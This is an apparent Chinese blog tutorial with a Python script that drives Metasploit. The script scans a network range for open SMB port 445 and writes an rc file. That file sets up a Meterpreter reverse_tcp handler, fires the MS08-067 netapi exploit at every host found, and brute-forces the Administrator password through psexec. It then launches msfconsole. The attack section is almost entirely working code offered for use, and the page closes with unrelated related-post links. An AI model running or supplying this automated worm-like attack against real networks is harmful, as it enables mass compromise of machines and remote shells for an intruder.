Metasploit是一款强大的漏洞扫描和利用工具,编写Python脚本与Metasploit进行交互,可以自动化的扫描和利用漏洞。

相关文章:Metasploit框架的使用

在脚本中,我们首选需要利用 nmap 模块扫描目标主机是否开放了445端口,我们写了一个 findTarget() 函数,来扫描给定ip或者给定网段中开放了目标端口的主机,返回开放了445端口的主机列表。445端口是作为SMB文件共享协议的端口,在这个端口上,经常爆发出各种高危的漏洞。 相关文章:文件共享协议之139/445端口

def findTarget(Hosts):              #扫描网段范围内开放445端口的主机
nmScan=nmap.PortScanner()
nmScan.scan(Hosts,'445')
targets=[]
for t in nmScan.all_hosts():
if nmScan[t].has_tcp(445): #如果445端口提供了协议
state=nmScan[t]['tcp'][445]['state'] #查看445端口的状态
if state=='open':
print '[+]Found Target Host:'+t
targets.append(t) return targets #返回开放445端口的主机列表

Metasploit提供了一个被称为Meterpreter的高级动态载荷,它是一种后渗透工具。当渗透进目标主机后,Meterpreter会主动连接目标主机,并提供大量 分析和控制主机的参数。我们写了setupHandler()函数,使用 exploit/multi/handler监听数据,我们设置payload为 windows/x64/meterpreter/reverse_tcp 。我们还需要设置一个全局变量DisablePayloadHandler,其作用是:我们已经新建了一个监听器,以后所有的主机都不必重复新建监听器。相关文章:Meterpreter之exploit/multi/handler木马

def setupHandler(configFile,lhost,lport):               #监听被攻击的主机
configFile.write('use exploit/multi/handler\n') #使用
configFile.write('set PAYLOAD windows/meterpreter/reverse_tcp \n') #设定payload载荷
configFile.write('set LPORT '+str(lport)+'\n') #设置监听的端口
configFile.write('set LHOST '+lhost+'\n') #设置监听的主机,也就是我们的主机
configFile.write('set DisablePayloadHandler 1\n') #不重新监听
configFile.write('exploit -j -z\n') #监听 j选项是将所有连接的会话保持在后台 -z不与任务进行即时交换

当脚本能够在目标主机上执行漏洞利用代码时,配置函数将向Metasploit  rc 脚本中写入用于生成漏洞利用代码的目标主机、本地地址和端口。该函数还将把使用哪个漏洞利用代码的指令也写入rc脚本文件中,这里我们使用 MS_08067_netapi漏洞。此外,该函数还需要设置Payload、Lport。最后,该脚本发送一条指令在同一个任务(job)的上下文环境中( -j ),不与任务进行即时交互的条件下 ( -z ) 利用对目标计算机上的漏洞

def confickerExploit(configFile,target,lhost,lport):       #漏洞利用
configFile.write('use exploit/windows/smb/ms08_067_netapi\n') #漏洞利用代码
configFile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
configFile.write('set RHOST '+str(target)+'\n') #设定参数
configFile.write('set LPORT '+str(lport)+'\n')
configFile.write('set LHOST '+lhost+'\n')
configFile.write('exploit \n')

尽管如此我们已经可以成功的在被黑的主机上运行漏洞利用代码,但一旦目标主机安装了最新的安全补丁便可以阻止该代码被执行,因此我们的脚本还需要另一种攻击方式,如暴力破解SMB用户名和密码,以此获取在目标主机上远程执行一个进程的权限。输入smbBrute() 函数的参数有:Metasploit 脚本文件、目标主机、包含密码列表的另一个文件、本地地址、端口。用户名默认为windows管理员Administrator,打开密码列表文件,对于每一个密码,都会生成一个用来远程执行进程的Metasploit脚本,如果密码正确则远程执行进程的代码就会运行一个shell到攻击者本地地址对应的端口。

def smbBrute(configFile,target,passwdFile,lhost,lport):
username='Administrator'
pF=open(passwordFile,'r')
for password in pF.readlines():
password=password.strip('\n')
configFile.write('use exploit/windows/smb/psexec\n')
configFile.write('set SMBUser '+str(username)+'\n')
configFile.write('set SMBPass '+str(password)+'\n')
configFile.write('set RHOST '+str(target)+'\n')
configFile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
configFile.write('set LPORT '+str(lport)+'\n')
configFile.write('set LHOST '+lhost+'\n')
configFile.write('exploit -j -z\n')

最后,对上面所有的代码进行整合。

# -*- coding: utf-8 -*-
"""
Created on Sun Nov 4 16:11:33 2018
@author: 小谢
"""
import os
import optparse
import sys
import nmap
def findTarget(Hosts): #扫描网段范围内开放445端口的主机
nmScan=nmap.PortScanner()
nmScan.scan(Hosts,'445')
targets=[]
for t in nmScan.all_hosts():
if nmScan[t].has_tcp(445): #如果445端口提供了协议
state=nmScan[t]['tcp'][445]['state'] #查看445端口的状态
if state=='open':
print '[+]Found Target Host:'+t
targets.append(t)
return targets #返回开放445端口的主机列表
def setupHandler(configFile,lhost,lport): #监听被攻击的主机
configFile.write('use exploit/multi/handler\n') #使用
configFile.write('set PAYLOAD windows/meterpreter/reverse_tcp \n') #设定payload载荷
configFile.write('set LPORT '+str(lport)+'\n') #设置监听的端口
configFile.write('set LHOST '+lhost+'\n') #设置监听的主机,也就是我们的主机
configFile.write('set DisablePayloadHandler 1\n') #不重新监听
configFile.write('exploit -j -z\n') #监听 j选项是将所有连接的会话保持在后台 -z不与任务进行即时交换 def confickerExploit(configFile,target,lhost,lport): #漏洞利用
configFile.write('use exploit/windows/smb/ms08_067_netapi\n') #漏洞利用代码
configFile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
configFile.write('set RHOST '+str(target)+'\n') #设定参数
configFile.write('set LPORT '+str(lport)+'\n')
configFile.write('set LHOST '+lhost+'\n')
configFile.write('exploit \n')
def smbBrute(configFile,target,passwdFile,lhost,lport): #暴力破解SMB口令
username='Administrator'
pF=open(passwordFile,'r')
for password in pF.readlines():
password=password.strip('\n')
configFile.write('use exploit/windows/smb/psexec\n')
configFile.write('set SMBUser '+str(username)+'\n')
configFile.write('set SMBPass '+str(password)+'\n')
configFile.write('set RHOST '+str(target)+'\n')
configFile.write('set PAYLOAD windows/meterpreter/reverse_tcp\n')
configFile.write('set LPORT '+str(lport)+'\n')
configFile.write('set LHOST '+lhost+'\n')
configFile.write('exploit -j -z\n')
def main():
configFile=open('meta.rc','w') #以写入方式打开配置文件
usage='[-]Usage %prog -H <RHOSTS> -l/-L <LHOST> [-p/-P <LPORT> -F/-f <password File>]'
parser=optparse.OptionParser(usage)
parser.add_option('-H',dest='target',type='string',help='target host')
parser.add_option('-p','-P',dest='lport',type='string',help='listen port')
parser.add_option('-l','-L',dest='lhost',type='string',help='listen address')
parser.add_option('-F','-f',dest='passwdFile',type='string',help='password file')
(options,args)=parser.parse_args()
passwdFile=options.passwdFile
target=options.target
lport=options.lport
lhost=options.lhost
if (target==None)|(lhost==None):
print parser.usage
exit(0)
if options.lport==None:
lport=='2333'
targets=findTarget(options.target) #寻找目标
setupHandler(configFile,lhost,lport) #设置配置文件
for target in targets: #逐个攻击
confickerExploit(configFile,target,lhost,lport)
if passwdFile!=None:
smbBrute(configFile,target,passwdFile,lhost,lport)
configFile.close()
os.system('msfconsole -r meta.rc') #启动metasploit并读取配置文件
if __name__=='__main__':
main()

当我们运行脚本,指定好参数后,脚本就会扫描目标主机中开放了445端口的主机,将其加入到 targets 列表中,然后将要攻击的代码写入 meta.rc 配置文件中,最后启动MSF读取配置文件进行攻击!

Python脚本与Metasploit交互攻击的更多相关文章

  1. Python脚本与Metasploit交互进行自动永恒之蓝攻击

    我们首先利用 findTarget() 函数找到目标网段或目标主机中开放了445端口的主机,然后利用 confickerExploit() 函数将攻击代码写入 configure.rc 配置文件中,最 ...

  2. ArcGIS使用Python脚本工具

    在Pyhton写的一些代码,用户交互不方便,用户体验比较差,不方便重用.在ArcGIS中可以将用写的Python代码导入到ToolBox中,这样用起来就比较方便了.这里用按要素裁剪栅格的Python来 ...

  3. 用 Python 脚本实现对 Linux 服务器的监控

    目前 Linux 下有一些使用 Python 语言编写的 Linux 系统监控工具 比如 inotify-sync(文件系统安全监控软件).glances(资源监控工具)在实际工作中,Linux 系统 ...

  4. 用 Python 脚本实现对 Linux 服务器的网卡流量监控

    *这篇文章网上已经有相关代码,为了加深印象,我做了相关批注,希望对朋友们有帮助 工作原理:基于/proc文件系统 Linux 系统为管理员提供了非常好的方法,使其可以在系统运行时更改内核,而不需要重新 ...

  5. Python 脚本实现对 Linux 服务器的监控

    本文来自我的github pages博客http://galengao.github.io/ 即www.gaohuirong.cn 摘要: 原文地址 由于原文来自微信公众号,并且脚本都是图片,所以这里 ...

  6. WEB中间件--tomcat爆破,burp和python脚本

    1.tomcat 用burpsuit进行弱口令爆破 先抓包 发送到inturder payload type 选择custom iterater 第一个payload选用户名文件,第二个payload ...

  7. java 调用 python 脚本

    有时候在java项目里,需要执行Python脚本以下几种方式: 1.直接执行Python脚本代码 引用 org.python包 创建一个 python解释器,貌似这种方式不可以导入第三方库,模块... ...

  8. python ctypes 探究 ---- python 与 c 的交互

    近几天使用 python 与 c/c++ 程序交互,网上有推荐swig但效果都不理想,所以琢磨琢磨了 python 的 ctypes 模块.同时,虽然网上有这方面的内容,但是感觉还是没说清楚.这里记录 ...

  9. python 全栈开发,Day94(Promise,箭头函数,Django REST framework,生成json数据三种方式,serializers,Postman使用,外部python脚本调用django)

    昨日内容回顾 1. 内容回顾 1. VueX VueX分三部分 1. state 2. mutations 3. actions 存放数据 修改数据的唯一方式 异步操作 修改state中数据的步骤: ...

随机推荐

  1. Java 常见对象 02

    常见对象·String类 Scanner 的概述和方法介绍 * A:Scanner 的概述 * B:Scanner 的构造方法原理 * Scanner(InputStream source) * Sy ...

  2. Debian中的NVIDIA显卡驱动安装——超简单,一行命令

    其实Debian的non-free固件中包含NVIDIA的显卡驱动,所以没必要在官网下run包一步一步来 sudo apt install nvidia-settings 安装时会提示与X冲突,没关系 ...

  3. swaks制作钓鱼邮件

      一.在网站:https://bccto.me/ 申请一个十分钟的邮箱 二.使用命令行,命令行解释如下: --from hacker@qq.com //发件人的邮箱 --ehlo qq.com // ...

  4. redhat配置问题

    redhat开机自动连接网络配置 vim  /etc/sysconfig/network-scripts/ifcfg-eth0 将  ONBOOT=no 更改为 yes 即可 redhat配置 yum ...

  5. 【博弈论】组合游戏及SG函数浅析

    目录 预备知识 普通的Nim游戏 SG函数 预备知识 公平组合游戏(ICG) 若一个游戏满足: 由两名玩家交替行动: 游戏中任意时刻,合法操作集合只取决于这个局面本身: 若轮到某位选手时,若该选手无合 ...

  6. 普通 Javaweb项目模板的搭建

    普通 Javaweb项目模板的搭建 1. 创建一个web项目模板的maven项目 2.配置 Tomcat 服务器 3.先测试一下该空项目 4.注入 maven 依赖 5.创建项目的包结构 6.编写基础 ...

  7. 计算机体系结构——CH4 输入输出系统

    计算机体系结构--CH4 输入输出系统 右键点击查看图像,查看清晰图像 X-mind 计算机体系结构--CH4 输入输出系统 输入输出原理 特点 实时性 与设备无关性 异步性 输入输出系统的组织方式 ...

  8. [GDKOI2021] 普及组 Day2 总结

    [ G D K O I 2021 ] 普 及 组 D a y 2 总 结 [GDKOI2021] 普及组 Day2 总结 [GDKOI2021]普及组Day2总结 时间安排和昨天的GDKOI2021 ...

  9. 99%的Python用户都不知道的f-string隐秘技巧

    f-string想必很多Python用户都基础性的使用过,作为Python3.6版本开始引入的特性,通过它我们可以更加方便地向字符串中嵌入自定义内容,但f-string真正蕴含的功能远比大多数用户知道 ...

  10. java面试-强引用、软引用、弱引用和幻象引用有什么区别

    在Java语言中,除了基本数据类型外,其他的都是指向各类对象的对象引用:Java中根据其生命周期的长短,将引用分为4类. 不同的引用类型,主要体现的是对象不同的可达性状态和对垃圾收集的影响. 1 .强 ...